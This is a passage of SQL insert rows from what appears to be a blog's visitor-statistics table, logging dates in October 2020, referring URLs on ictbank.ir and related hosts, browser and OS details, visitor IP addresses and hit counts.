(5352,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.2','000',0,1,0),
(5353,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.57.18','000',0,1,0),
(5354,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.58.1','000',0,1,0),
(5355,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.5','000',0,1,0),
(5356,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.255.200.31','000',0,1,0),
(5357,'2020-10-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5358,'2020-10-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(5359,'2020-10-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','14.225.5.37','000',0,2,0),
(5360,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(5361,'2020-10-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,2,0),
(5362,'2020-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.3.148','000',0,1,0),
(5363,'2020-10-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(5364,'2020-10-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','45.227.255.224','000',0,1,0),
(5365,'2020-10-03','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','173.255.246.21','000',0,1,0),
(5366,'2020-10-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(5367,'2020-10-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5368,'2020-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.206.45','000',0,1,0),
(5369,'2020-10-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5370,'2020-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.160.194','000',0,1,0),
(5371,'2020-10-03','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','121.144.15.62','000',0,1,0),
(5372,'2020-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.60.21','000',0,1,0),
(5373,'2020-10-03','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','104.236.168.190','000',0,2,0),
(5374,'2020-10-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.189.12.219','000',0,1,0),
(5375,'2020-10-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5376,'2020-10-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(5377,'2020-10-03','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','46.4.21.234','000',0,1,0),
(5378,'2020-10-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,6,0),
(5379,'2020-10-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,5,0),
(5380,'2020-10-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.23.78','000',0,1,0),
(5381,'2020-10-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(5382,'2020-10-04','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','103.151.10.132','000',0,1,0),
(5383,'2020-10-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.5.105','000',0,1,0),
(5384,'2020-10-04','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','37.194.188.26','000',0,1,0),
(5385,'2020-10-04','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','52.252.230.176','000',0,1,0),
(5386,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','176.107.187.151','000',0,1,0),
(5387,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.195','000',0,1,0),
(5388,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.81.83.123','000',0,1,0),
(5389,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','18.27.197.252','000',0,1,0),
(5390,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.100.253','000',0,1,0),
(5391,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.100.247','000',0,1,0),
(5392,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.251.89.29','000',0,1,0),
(5393,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','139.28.36.20','000',0,3,0),
(5394,'2020-10-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.136','000',0,1,0),
(5395,'2020-10-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.192.223','000',0,1,0),
(5396,'2020-10-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.94.7','000',0,1,0),
(5397,'2020-10-04','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','191.101.88.237','000',0,1,0),
(5398,'2020-10-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.25','000',0,2,0),
(5399,'2020-10-04','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','109.173.92.108','000',0,1,0),
(5400,'2020-10-04','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','190.100.164.134','000',0,1,0),
(5401,'2020-10-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5402,'2020-10-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5403,'2020-10-05','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','52.252.230.176','000',0,1,0),
(5404,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.97.200.17','000',0,3,0),
(5405,'2020-10-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(5406,'2020-10-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.72','000',0,1,0),
(5407,'2020-10-05','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(5408,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.12.4','000',0,1,0),
(5409,'2020-10-05','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.133.154','000',0,1,0),
(5410,'2020-10-05','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','108.178.61.58','000',0,1,0),
(5411,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','103.210.18.28','000',0,1,0),
(5412,'2020-10-05','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5413,'2020-10-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(5414,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.228.25','000',0,1,0),
(5415,'2020-10-05','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5416,'2020-10-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.77.37','000',0,1,0),
(5417,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(5418,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.160.139','000',0,1,0),
(5419,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,1,0),
(5420,'2020-10-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5421,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.68.38.126','000',0,2,0),
(5422,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.26.247','000',0,1,0),
(5423,'2020-10-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(5424,'2020-10-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5425,'2020-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(5426,'2020-10-06','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','94.130.167.248','000',0,1,0),
(5427,'2020-10-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,6,0),
(5428,'2020-10-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(5429,'2020-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.186.10.18','000',0,1,0),
(5430,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.15.195','000',0,1,0),
(5431,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.167','000',0,2,0),
(5432,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.187.100','000',0,1,0),
(5433,'2020-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.15','000',0,4,0),
(5434,'2020-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','176.10.99.200','000',0,6,0),
(5435,'2020-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.98.49.153','000',0,1,0),
(5436,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.64','000',0,2,0),
(5437,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.205.144','000',0,1,0),
(5438,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,5,0),
(5439,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.56.96','000',0,1,0),
(5440,'2020-10-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5441,'2020-10-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.242','000',0,1,0),
(5442,'2020-10-06','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','216.74.103.249','000',0,1,0),
(5443,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.229.201.229','000',0,1,0),
(5444,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.223.245','000',0,1,0),
(5445,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.134.70','000',0,1,0),
(5446,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.97.129.70','000',0,1,0),
(5447,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.78.10.143','000',0,1,0),
(5448,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.219.232.17','000',0,1,0),
(5449,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.90.220.82','000',0,1,0),
(5450,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.244.141.169','000',0,1,0),
(5451,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.93.54.4','000',0,1,0),
(5452,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','75.119.211.174','000',0,1,0),
(5453,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.9.78.145','000',0,1,0),
(5454,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.87.129.65','000',0,1,0),
(5455,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.128.38.240','000',0,1,0),
(5456,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.246.105','000',0,1,0),
(5457,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.131.100.255','000',0,1,0),
(5458,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.116.203.171','000',0,1,0),
(5459,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','85.214.24.163','000',0,1,0),
(5460,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.209.27.61','000',0,1,0),
(5461,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.196.53.13','000',0,1,0),
(5462,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.227.4.30','000',0,1,0),
(5463,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','101.0.74.84','000',0,1,0),
(5464,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.10.129.110','000',0,1,0),
(5465,'2020-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.198.160.39','000',0,1,0),
(5466,'2020-10-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5467,'2020-10-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5468,'2020-10-06','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','66.198.246.47','000',0,1,0),
(5469,'2020-10-06','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','134.209.157.198','000',0,1,0),
(5470,'2020-10-06','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','118.193.35.169','000',0,1,0),
(5471,'2020-10-06','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','134.209.148.6','000',0,1,0),
(5472,'2020-10-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,6,0),
(5473,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.205.160','000',0,1,0),
(5474,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.12.92.125','000',0,1,0),
(5475,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','119.28.7.151','000',0,1,0),
(5476,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.254.140.71','000',0,1,0),
(5477,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','150.185.8.162','000',0,1,0),
(5478,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.201.37.99','000',0,1,0),
(5479,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.194.193.47','000',0,1,0),
(5480,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.160.179.7','000',0,1,0),
(5481,'2020-10-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(5482,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.74.123.2','000',0,1,0),
(5483,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.241.50.53','000',0,1,0),
(5484,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.72.30.48','000',0,1,0),
(5485,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.79.19.212','000',0,1,0),
(5486,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.15.206.214','000',0,1,0),
(5487,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.16.97','000',0,1,0),
(5488,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.86.74.206','000',0,1,0),
(5489,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.216.130','000',0,1,0),
(5490,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.231.190.250','000',0,1,0),
(5491,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','101.99.77.10','000',0,1,0),
(5492,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.111.136','000',0,1,0),
(5493,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.119.84.18','000',0,1,0),
(5494,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.70.80.21','000',0,1,0),
(5495,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.113.162.101','000',0,1,0),
(5496,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.228.93.39','000',0,1,0),
(5497,'2020-10-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(5498,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.25.242.19','000',0,1,0),
(5499,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.195.220','000',0,1,0),
(5500,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(5501,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.246.162','000',0,1,0),
(5502,'2020-10-07','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.208.88.248','000',0,1,0),
(5503,'2020-10-07','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Opera','Windows','10.0',NULL,NULL,'','185.232.21.156','000',0,2,0),
(5504,'2020-10-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(5505,'2020-10-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5506,'2020-10-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.2.4.66','000',0,1,0),
(5507,'2020-10-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(5508,'2020-10-08','ictbank.ir','Safari','Windows','6.1',NULL,NULL,'','46.21.192.7','000',0,2,0),
(5509,'2020-10-08','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','96.9.89.26','000',0,1,0),
(5510,'2020-10-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,7,0),
(5511,'2020-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.29.97.3','000',0,1,0),
(5512,'2020-10-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5513,'2020-10-08','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5514,'2020-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.216.186.163','000',0,42,0),
(5515,'2020-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.240.0','000',0,1,0),
(5516,'2020-10-08','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','49.233.175.204','000',0,1,0),
(5517,'2020-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,11,0),
(5518,'2020-10-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','211.20.181.113','000',0,1,0),
(5519,'2020-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.73.142','000',0,1,0),
(5520,'2020-10-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','129.226.49.27','000',0,1,0),
(5521,'2020-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.89.137','000',0,1,0),
(5522,'2020-10-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5523,'2020-10-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5524,'2020-10-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(5525,'2020-10-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.14.45.130','000',0,1,0),
(5526,'2020-10-08','design-arena.ir','Safari','Windows','6.1',NULL,NULL,'','51.254.204.117','000',0,2,0),
(5527,'2020-10-08','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,4,0),
(5528,'2020-10-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(5529,'2020-10-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(5530,'2020-10-09','http://ictbank.ir/blog','Chrome','OS X','10.9.0',NULL,NULL,'','14.232.223.154','000',0,1,0),
(5531,'2020-10-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(5532,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.88.60','000',0,1,0),
(5533,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.18','000',0,2,0),
(5534,'2020-10-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,6,0),
(5535,'2020-10-09','ictbank.ir','Safari','Windows','6.1',NULL,NULL,'','69.163.251.248','000',0,2,0),
(5536,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.79.255','000',0,1,0),
(5537,'2020-10-09','design-arena.ir','Safari','Windows','6.1',NULL,NULL,'','178.20.156.72','000',0,2,0),
(5538,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.83.191','000',0,1,0),
(5539,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.8','000',0,3,0),
(5540,'2020-10-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','197.53.163.6','000',0,1,0),
(5541,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.93.141','000',0,1,0),
(5542,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.188','000',0,1,0),
(5543,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.161.116.175','000',0,1,0),
(5544,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.172','000',0,1,0),
(5545,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(5546,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.9','000',0,1,0),
(5547,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.196.53.13','000',0,1,0),
(5548,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.193','000',0,1,0),
(5549,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.68.38.126','000',0,1,0),
(5550,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.78.211.46','000',0,1,0),
(5551,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.3','000',0,1,0),
(5552,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.155','000',0,1,0),
(5553,'2020-10-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(5554,'2020-10-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5555,'2020-10-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5556,'2020-10-09','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','148.66.128.113','000',0,1,0),
(5557,'2020-10-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(5558,'2020-10-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(5559,'2020-10-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,5,0),
(5560,'2020-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.235.129.81','000',0,156,0),
(5561,'2020-10-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','108.178.61.58','000',0,1,0),
(5562,'2020-10-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','52.235.63.51','000',0,1,0),
(5563,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.215.71','000',0,1,0),
(5564,'2020-10-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5565,'2020-10-10','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','162.241.236.252','000',0,1,0),
(5566,'2020-10-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','31.13.127.18','000',0,1,0),
(5567,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.179.76','000',0,1,0),
(5568,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.106.80','000',0,1,0),
(5569,'2020-10-10','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.236.76.172','000',0,1,0),
(5570,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.152.126','000',0,1,0),
(5571,'2020-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(5572,'2020-10-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.137.22.91','000',0,1,0),
(5573,'2020-10-10','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.193.104.168','000',0,4,0),
(5574,'2020-10-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','119.134.109.91','000',0,1,0),
(5575,'2020-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5576,'2020-10-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(5577,'2020-10-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5578,'2020-10-10','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','18.208.158.92','000',0,2,0),
(5579,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.191.204.145','000',0,1,0),
(5580,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,2,0),
